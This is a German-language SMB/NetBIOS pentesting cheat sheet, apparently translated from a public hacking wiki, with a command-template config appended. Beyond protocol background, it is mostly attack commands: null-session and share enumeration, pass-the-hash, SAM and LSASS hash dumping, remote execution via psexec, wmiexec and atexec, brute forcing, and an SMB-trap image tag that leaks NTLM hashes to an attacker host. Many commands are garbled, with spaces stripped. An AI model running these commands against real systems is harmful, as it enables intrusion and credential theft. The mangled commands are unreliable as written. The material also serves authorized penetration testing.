Das Network Basic Input Output System** (NetBIOS)** ist ein Softwareprotokoll, das entwickelt wurde, um Anwendungen, PCs und Desktops innerhalb eines lokalen Netzwerks (LAN) zu ermöglichen, mit Netzwerkhardware zu interagieren und die Übertragung von Daten über das Netzwerk zu erleichtern. Die Identifizierung und Lokalisierung von Softwareanwendungen, die in einem NetBIOS-Netzwerk betrieben werden, erfolgt über ihre NetBIOS-Namen, die bis zu 16 Zeichen lang sein können und oft von dem Computernamen abweichen. Eine NetBIOS-Sitzung zwischen zwei Anwendungen wird initiiert, wenn eine Anwendung (die als Client fungiert) einen Befehl ausgibt, um eine andere Anwendung (die als Server fungiert) über TCP Port 139 zu "rufen".
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
Port 445
Technisch gesehen wird Port 139 als 'NBT über IP' bezeichnet, während Port 445 als 'SMB über IP' identifiziert wird. Das Akronym SMB steht für 'Server Message Blocks', das auch modern als Common Internet File System (CIFS) bekannt ist. Als Netzwerkprotokoll auf Anwendungsebene wird SMB/CIFS hauptsächlich verwendet, um den gemeinsamen Zugriff auf Dateien, Drucker, serielle Ports zu ermöglichen und verschiedene Kommunikationsformen zwischen Knoten in einem Netzwerk zu erleichtern.
Zum Beispiel wird im Kontext von Windows hervorgehoben, dass SMB direkt über TCP/IP betrieben werden kann, wodurch die Notwendigkeit für NetBIOS über TCP/IP entfällt, durch die Nutzung von Port 445. Umgekehrt wird auf anderen Systemen die Verwendung von Port 139 beobachtet, was darauf hinweist, dass SMB in Verbindung mit NetBIOS über TCP/IP ausgeführt wird.
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
SMB
Das Server Message Block (SMB) Protokoll, das im Client-Server-Modell arbeitet, ist dafür konzipiert, Zugriff auf Dateien, Verzeichnisse und andere Netzwerkressourcen wie Drucker und Router zu regeln. Primär innerhalb der Windows-Betriebssystemreihe genutzt, gewährleistet SMB die Abwärtskompatibilität, sodass Geräte mit neueren Versionen von Microsofts Betriebssystem nahtlos mit solchen interagieren können, die ältere Versionen ausführen. Darüber hinaus bietet das Samba-Projekt eine kostenlose Softwarelösung, die die Implementierung von SMB auf Linux- und Unix-Systemen ermöglicht und somit die plattformübergreifende Kommunikation über SMB erleichtert.
Freigaben, die willkürliche Teile des lokalen Dateisystems repräsentieren, können von einem SMB-Server bereitgestellt werden, wodurch die Hierarchie für einen Client teilweise unabhängig von der tatsächlichen Struktur des Servers sichtbar wird. Die Access Control Lists (ACLs), die Zugriffsrechte definieren, ermöglichen eine fein abgestimmte Kontrolle über Benutzerberechtigungen, einschließlich Attribute wie execute, read und full access. Diese Berechtigungen können einzelnen Benutzern oder Gruppen basierend auf den Freigaben zugewiesen werden und sind von den lokalen Berechtigungen, die auf dem Server festgelegt sind, zu unterscheiden.
IPC$ Share
Zugriff auf die IPC$-Freigabe kann durch eine anonyme Nullsitzung erlangt werden, die die Interaktion mit Diensten ermöglicht, die über benannte Pipes bereitgestellt werden. Das Dienstprogramm enum4linux ist dafür nützlich. Richtig eingesetzt, ermöglicht es den Erwerb von:
Informationen über das Betriebssystem
Einzelheiten zur übergeordneten Domäne
Eine Zusammenstellung lokaler Benutzer und Gruppen
Informationen über verfügbare SMB-Freigaben
Die effektive System-Sicherheitsrichtlinie
Diese Funktionalität ist entscheidend für Netzwerkadministratoren und Sicherheitsfachleute, um die Sicherheitslage der SMB (Server Message Block)-Dienste in einem Netzwerk zu bewerten. enum4linux bietet einen umfassenden Überblick über die SMB-Umgebung des Zielsystems, was entscheidend ist, um potenzielle Schwachstellen zu identifizieren und sicherzustellen, dass die SMB-Dienste ordnungsgemäß gesichert sind.
enum4linux-atarget_ip
Der obige Befehl ist ein Beispiel dafür, wie enum4linux verwendet werden kann, um eine vollständige Enumeration gegen ein Ziel, das durch target_ip angegeben ist, durchzuführen.
Was ist NTLM
Wenn Sie nicht wissen, was NTLM ist oder wie es funktioniert und wie man es ausnutzen kann, werden Sie diese Seite über NTLM sehr interessant finden, auf der erklärt wird, wie dieses Protokoll funktioniert und wie Sie es ausnutzen können:
Um nach möglichen Exploits für die SMB-Version zu suchen, ist es wichtig zu wissen, welche Version verwendet wird. Wenn diese Informationen in anderen verwendeten Tools nicht angezeigt werden, können Sie:
Das MSF Hilfsmodul _auxiliary/scanner/smb/smb_version verwenden
Oder dieses Skript:
#!/bin/sh#Author: rewardone#Description:# Requires root or enough permissions to use tcpdump# Will listen for the first 7 packets of a null login# and grab the SMB Version#Notes:# Will sometimes not capture or will print multiple# lines. May need to run a second time for success.if [ -z $1 ]; thenecho"Usage: ./smbver.sh RHOST {RPORT}"&&exit; else rhost=$1; fiif [ !-z $2 ]; then rport=$2; else rport=139; fitcpdump-s0-n-itap0src $rhost andport $rport -A-c72>/dev/null|grep-i"samba\|s.a.m"|tr-d'.'|grep-oP'UnixSamba.*[0-9a-z]'|tr-d'\n'&echo-n"$rhost: "&echo"exit"|smbclient-L $rhost 1>/dev/null2>/dev/nullecho""&&sleep.1
#Dump interesting informationenum4linux-a [-u "<username>"-p"<passwd>"]<IP>enum4linux-ng-A [-u "<username>"-p"<passwd>"]<IP>nmap--script"safe or smb-enum-*"-p445<IP>#Connect to the rpcrpcclient-U""-N<IP>#No credsrpcclient//machine.htb-Udomain.local/USERNAME%754d87d42adabcca32bdb34a876cbffb--pw-nt-hashrpcclient-U"username%passwd"<IP>#With creds#You can use querydispinfo and enumdomusers to query user information#Dump user information/usr/share/doc/python3-impacket/examples/samrdump.py-port139 [[domain/]username[:password]@]<targetName or address>/usr/share/doc/python3-impacket/examples/samrdump.py-port445 [[domain/]username[:password]@]<targetName or address>#Map possible RPC endpoints/usr/share/doc/python3-impacket/examples/rpcdump.py-port135 [[domain/]username[:password]@]<targetName or address>/usr/share/doc/python3-impacket/examples/rpcdump.py-port139 [[domain/]username[:password]@]<targetName or address>/usr/share/doc/python3-impacket/examples/rpcdump.py-port445 [[domain/]username[:password]@]<targetName or address>
Benutzer, Gruppen und angemeldete Benutzer auflisten
Diese Informationen sollten bereits von enum4linux und enum4linux-ng gesammelt werden.
Es wird immer empfohlen zu überprüfen, ob Sie auf etwas zugreifen können. Wenn Sie keine Anmeldeinformationen haben, versuchen Sie es mit nullAnmeldeinformationen/Gastbenutzer.
smbclient--no-pass-L//<IP># Null usersmbclient-U'username[%passwd]'-L [--pw-nt-hash] //<IP>#If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hashsmbmap-H<IP> [-P <PORT>]#Null usersmbmap-u"username"-p"password"-H<IP> [-P <PORT>]#Credssmbmap-u"username"-p"<NT>:<LM>"-H<IP> [-P <PORT>]#Pass-the-Hashsmbmap-R-u"username"-p"password"-H<IP> [-P <PORT>]#Recursive listcrackmapexecsmb<IP>-u''-p''--shares#Null usercrackmapexecsmb<IP>-u'username'-p'password'--shares#Guest usercrackmapexecsmb<IP>-u'username'-H'<HASH>'--shares#Guest user
Verbinden/Auflisten eines freigegebenen Ordners
#Connect using smbclientsmbclient--no-pass//<IP>/<Folder>smbclient-U'username[%passwd]'-L [--pw-nt-hash] //<IP>#If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash#Use --no-pass -c 'recurse;ls' to list recursively with smbclient#List with smbmap, without folder it list everythingsmbmap [-u "username"-p"password"]-R [Folder] -H <IP> [-P <PORT>] # Recursive listsmbmap [-u "username"-p"password"]-r [Folder] -H <IP> [-P <PORT>] # Non-Recursive listsmbmap-u"username"-p"<NT>:<LM>" [-r/-R] [Folder] -H <IP> [-P <PORT>] #Pass-the-Hash
Manuell Windows-Freigaben auflisten und sich mit ihnen verbinden
Es kann sein, dass Sie eingeschränkt sind, um Freigaben des Host-Systems anzuzeigen, und wenn Sie versuchen, sie aufzulisten, scheint es, als ob es keine Freigaben gibt, mit denen Sie sich verbinden können. Daher könnte es sich lohnen, einen kurzen Versuch zu unternehmen, sich manuell mit einer Freigabe zu verbinden. Um die Freigaben manuell aufzulisten, sollten Sie nach Antworten wie NT_STATUS_ACCESS_DENIED und NT_STATUS_BAD_NETWORK_NAME suchen, wenn Sie eine gültige Sitzung verwenden (z. B. Null-Sitzung oder gültige Anmeldeinformationen). Diese können anzeigen, ob die Freigabe existiert und Sie keinen Zugriff darauf haben oder ob die Freigabe überhaupt nicht existiert.
Häufige Freigabenamen für Windows-Ziele sind
C$
D$
ADMIN$
IPC$
PRINT$
FAX$
SYSVOL
NETLOGON
(Häufige Freigabenamen aus Network Security Assessment 3rd edition)
Sie können versuchen, sich mit ihnen zu verbinden, indem Sie den folgenden Befehl verwenden
smbclient-U'%'-N \\\\<IP>\\<SHARE># null session to connect to a windows sharesmbclient-U'<USER>' \\\\<IP>\\<SHARE># authenticated session to connect to a windows share (you will be prompted for a password)
oder dieses Skript (unter Verwendung einer Null-Sitzung)
#/bin/baship='<TARGET-IP-HERE>'shares=('C$''D$''ADMIN$''IPC$''PRINT$''FAX$''SYSVOL''NETLOGON')for share in ${shares[*]}; dooutput=$(smbclient-U'%'-N \\\\$ip\\$share -c'')if [[ -z $output ]]; thenecho"[+] creating a null session is possible for $share"# no output if command goes through, thus assuming that a session was createdelseecho $output # echo error message (e.g. NT_STATUS_ACCESS_DENIED or NT_STATUS_BAD_NETWORK_NAME)fidone
Beispiele
smbclient-U'%'-N \\\\192.168.0.24\\im_clearly_not_here# returns NT_STATUS_BAD_NETWORK_NAMEsmbclient-U'%'-N \\\\192.168.0.24\\ADMIN$ # returns NT_STATUS_ACCESS_DENIED or even gives you a session
Freigaben von Windows auflisten / ohne Drittanbieter-Tools
PowerShell
# Retrieves the SMB shares on the locale computer.Get-SmbShareGet-WmiObject-Class Win32_Share# Retrieves the SMB shares on a remote computer.get-smbshare-CimSession "<computer name or session object>"# Retrieves the connections established from the local SMB client to the SMB servers.Get-SmbConnection
CMD-Konsole
# List shares on the local computernetshare# List shares on a remote computer (including hidden ones)netview \\<ip>/all
Besonders interessant sind von Freigaben die Dateien Registry.xml, da sie Passwörter für Benutzer enthalten können, die über autologon über Gruppenrichtlinien konfiguriert sind. Oder web.config-Dateien, da sie Anmeldeinformationen enthalten.
Die SYSVOL-Freigabe ist für alle authentifizierten Benutzer in der Domäne lesbar. Dort können Sie viele verschiedene Batch-, VBScript- und PowerShell-Skriptefinden.
Sie sollten die Skripte darin überprüfen, da Sie möglicherweise sensible Informationen wie Passwörterfinden.
Registrierung lesen
Möglicherweise können Sie die Registrierung lesen, indem Sie einige entdeckte Anmeldeinformationen verwenden. Impacket reg.py ermöglicht es Ihnen, es zu versuchen:
Die Standardkonfiguration von einem Samba-Server befindet sich normalerweise in /etc/samba/smb.conf und könnte einige gefährliche Konfigurationen haben:
Einstellung
Beschreibung
browseable = yes
Erlaubt das Auflisten verfügbarer Freigaben im aktuellen Share?
read only = no
Verhindert die Erstellung und Modifikation von Dateien?
writable = yes
Erlaubt Benutzern, Dateien zu erstellen und zu modifizieren?
guest ok = yes
Erlaubt die Verbindung zum Dienst ohne Verwendung eines Passworts?
enable privileges = yes
Berücksichtigt Privilegien, die einem bestimmten SID zugewiesen sind?
create mask = 0777
Welche Berechtigungen müssen den neu erstellten Dateien zugewiesen werden?
directory mask = 0777
Welche Berechtigungen müssen den neu erstellten Verzeichnissen zugewiesen werden?
logon script = script.sh
Welches Skript muss beim Login des Benutzers ausgeführt werden?
magic script = script.sh
Welches Skript sollte ausgeführt werden, wenn das Skript geschlossen wird?
magic output = script.out
Wo muss die Ausgabe des magischen Skripts gespeichert werden?
Der Befehl smbstatus gibt Informationen über den Server und darüber, wer verbunden ist.
Authentifizieren mit Kerberos
Sie können sich mit Kerberos authentifizieren, indem Sie die Tools smbclient und rpcclient verwenden:
crackmapexec kann Befehle ausführen, indem es eine der mmcexec, smbexec, atexec, wmiexec missbraucht, wobei wmiexec die Standard-Methode ist. Sie können angeben, welche Option Sie mit dem Parameter --exec-method bevorzugen:
apt-getinstallcrackmapexeccrackmapexecsmb192.168.10.11-uAdministrator-p'P@ssw0rd'-X'$PSVersionTable'#Execute Powershellcrackmapexecsmb192.168.10.11-uAdministrator-p'P@ssw0rd'-xwhoami#Excute cmdcrackmapexecsmb192.168.10.11-uAdministrator-H<NTHASH>-xwhoami#Pass-the-Hash# Using --exec-method {mmcexec,smbexec,atexec,wmiexec}crackmapexecsmb<IP>-d<DOMAIN>-uAdministrator-p'password'--sam#Dump SAMcrackmapexecsmb<IP>-d<DOMAIN>-uAdministrator-p'password'--lsa#Dump LSASS in memmory hashescrackmapexecsmb<IP>-d<DOMAIN>-uAdministrator-p'password'--sessions#Get sessions (crackmapexecsmb<IP>-d<DOMAIN>-uAdministrator-p'password'--loggedon-users#Get logged-on userscrackmapexecsmb<IP>-d<DOMAIN>-uAdministrator-p'password'--disks#Enumerate the diskscrackmapexecsmb<IP>-d<DOMAIN>-uAdministrator-p'password'--users#Enumerate userscrackmapexecsmb<IP>-d<DOMAIN>-uAdministrator-p'password'--groups# Enumerate groupscrackmapexecsmb<IP>-d<DOMAIN>-uAdministrator-p'password'--local-groups# Enumerate local groupscrackmapexecsmb<IP>-d<DOMAIN>-uAdministrator-p'password'--pass-pol#Get password policycrackmapexecsmb<IP>-d<DOMAIN>-uAdministrator-p'password'--rid-brute#RID brutecrackmapexecsmb<IP>-d<DOMAIN>-uAdministrator-H<HASH>#Pass-The-Hash
Beide Optionen erstellen einen neuen Dienst (unter Verwendung von \pipe\svcctl über SMB) auf der Zielmaschine und nutzen ihn, um etwas auszuführen (psexec wird eine ausführbare Datei in den ADMIN$-Freigabe hochladen und smbexec wird auf cmd.exe/powershell.exe verweisen und die Argumente die Payload --file-less technique-- einfügen).
Mehr Informationen über psexecund smbexec.
In kali befindet es sich unter /usr/share/doc/python3-impacket/examples/
#If no password is provided, it will be prompted./psexec.py [[domain/]username[:password]@]<targetName or address>./psexec.py-hashes<LM:NT>administrator@10.10.10.103#Pass-the-Hashpsexec \\192.168.122.66-uAdministrator-p123456Wwpsexec \\192.168.122.66-uAdministrator-pq23q34t34twd3w34t34wtw34t# Use pass the hash
Using parameter-k you can authenticate against kerberos instead of NTLM
Heimlich eine Befehlszeile ausführen, ohne die Festplatte zu berühren oder einen neuen Dienst über DCOM über Port 135 auszuführen.
In kali befindet es sich unter /usr/share/doc/python3-impacket/examples/
#If no password is provided, it will be prompted./wmiexec.py [[domain/]username[:password]@]<targetName or address>#Prompt for password./wmiexec.py-hashesLM:NTadministrator@10.10.10.103#Pass-the-Hash#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted
Mit parameter-k können Sie sich an kerberos anstelle von NTLM authentifizieren.
#If no password is provided, it will be prompted./dcomexec.py [[domain/]username[:password]@]<targetName or address>./dcomexec.py-hashes<LM:NT>administrator@10.10.10.103#Pass-the-Hash#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted
Befehle über den Task Scheduler ausführen (unter Verwendung von \pipe\atsvc über SMB).
In kali befindet es sich unter /usr/share/doc/python3-impacket/examples/
./atexec.py [[domain/]username[:password]@]<targetName or address>"command"./atexec.py-hashes<LM:NT>administrator@10.10.10.175"whoami"
Dies wird nicht empfohlen, da Sie ein Konto sperren könnten, wenn Sie die maximal erlaubte Anzahl an Versuchen überschreiten
nmap--scriptsmb-brute-p445<IP>ridenum.py<IP>50050000/root/passwds.txt#Get usernames bruteforcing that rids and then try to bruteforce each user name
SMB-Relay-Angriff
Dieser Angriff verwendet das Responder-Toolkit, um SMB-Authentifizierungssitzungen in einem internen Netzwerk zu erfassen und sie an eine Zielmaschine zu relayen. Wenn die Authentifizierung sitzung erfolgreich ist, werden Sie automatisch in eine SystemShell geleitet.
Weitere Informationen zu diesem Angriff hier.
SMB-Trap
Die Windows-Bibliothek URLMon.dll versucht automatisch, sich beim Host zu authentifizieren, wenn eine Seite versucht, über SMB auf einige Inhalte zuzugreifen, zum Beispiel: img src="\\10.10.10.10\path\image.jpg"
Dies geschieht mit den Funktionen:
URLDownloadToFile
URLDownloadToCache
URLOpenStream
URLOpenBlockingStream
Die von einigen Browsern und Tools (wie Skype) verwendet werden.
SMBTrap mit MitMf
NTLM-Diebstahl
Ähnlich wie beim SMB-Trapping kann das Platzieren bösartiger Dateien auf einem Zielsystem (zum Beispiel über SMB) einen SMB-Authentifizierungsversuch auslösen, wodurch der NetNTLMv2-Hash mit einem Tool wie Responder abgefangen werden kann. Der Hash kann dann offline geknackt oder in einem SMB-Relay-Angriff verwendet werden.
Protocol_Name: SMB #Protocol Abbreviation if there is one.
Port_Number: 137,138,139 #Comma separated if there is more than one.
Protocol_Description: Server Message Block #Protocol Abbreviation Spelled out
Entry_1:
Name: Notes
Description: Notes for SMB
Note: |
While Port 139 is known technically as ‘NBT over IP’, Port 445 is ‘SMB over IP’. SMB stands for ‘Server Message Blocks’. Server Message Block in modern language is also known as Common Internet File System. The system operates as an application-layer network protocol primarily used for offering shared access to files, printers, serial ports, and other sorts of communications between nodes on a network.
#These are the commands I run in order every time I see an open SMB port
With No Creds
nbtscan {IP}
smbmap -H {IP}
smbmap -H {IP} -u null -p null
smbmap -H {IP} -u guest
smbclient -N -L //{IP}
smbclient -N //{IP}/ --option="client min protocol"=LANMAN1
rpcclient {IP}
rpcclient -U "" {IP}
crackmapexec smb {IP}
crackmapexec smb {IP} --pass-pol -u "" -p ""
crackmapexec smb {IP} --pass-pol -u "guest" -p ""
GetADUsers.py -dc-ip {IP} "{Domain_Name}/" -all
GetNPUsers.py -dc-ip {IP} -request "{Domain_Name}/" -format hashcat
GetUserSPNs.py -dc-ip {IP} -request "{Domain_Name}/"
getArch.py -target {IP}
With Creds
smbmap -H {IP} -u {Username} -p {Password}
smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP}
smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP} --pw-nt-hash `hash`
crackmapexec smb {IP} -u {Username} -p {Password} --shares
GetADUsers.py {Domain_Name}/{Username}:{Password} -all
GetNPUsers.py {Domain_Name}/{Username}:{Password} -request -format hashcat
GetUserSPNs.py {Domain_Name}/{Username}:{Password} -request
https://book.hacktricks.xyz/pentesting/pentesting-smb
Entry_2:
Name: Enum4Linux
Description: General SMB Scan
Command: enum4linux -a {IP}
Entry_3:
Name: Nmap SMB Scan 1
Description: SMB Vuln Scan With Nmap
Command: nmap -p 139,445 -vv -Pn --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse {IP}
Entry_4:
Name: Nmap Smb Scan 2
Description: SMB Vuln Scan With Nmap (Less Specific)
Command: nmap --script 'smb-vuln*' -Pn -p 139,445 {IP}
Entry_5:
Name: Hydra Brute Force
Description: Need User
Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} {IP} smb
Entry_6:
Name: SMB/SMB2 139/445 consolesless mfs enumeration
Description: SMB/SMB2 139/445 enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 445; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 445; run; exit'